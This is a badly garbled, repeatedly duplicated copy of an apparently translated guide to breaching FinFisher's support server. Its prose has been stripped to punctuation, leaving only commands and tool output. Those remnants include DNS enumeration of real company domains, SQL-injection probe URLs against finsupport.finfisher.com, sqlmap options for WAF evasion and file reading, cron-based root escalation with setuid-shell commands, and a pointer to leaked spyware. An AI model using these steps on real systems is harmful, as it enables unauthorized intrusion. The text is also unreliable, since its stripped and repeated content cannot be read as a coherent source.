https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-
www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-
academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,
fierce.pl
,
fierce.pl -dns
- IP-. , , .
Google . ,
academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,
academiproshop.com
, .
FinFisher
finsupport.finfisher.com
whois-
finfisher.com
, " FinFisher GmbH ".
"FinFisher GmbH" inurl:domaintools
gamma-international.de
,
finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .
fierce
git-,
git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.
fierce
, ,
test.company.com
dev.company.com
, . nikto .
webserver/.svn/
,
webserver/backup/
,
webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (
index.php
, , ).
Scripts/scripts.js.php
Google:
allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:
allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap
--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport .
/BackOffice/
403 Forbidden , SQL- ( ).
print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,
print.php
, . ! MySQL . ,
magicquotes
, MySQL-
INTO OUTFILE
. ,
sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,
unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,
cron
.
webalizer
, , . ,
cron
, ,
cron
.
ls -l /etc/localtime
, 6- ,
webalizer
, , , . , , , - , , . Root- , .
, . , , .
nmap
. nse-
nfs-*
smb-*
. finsupport - -,
qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
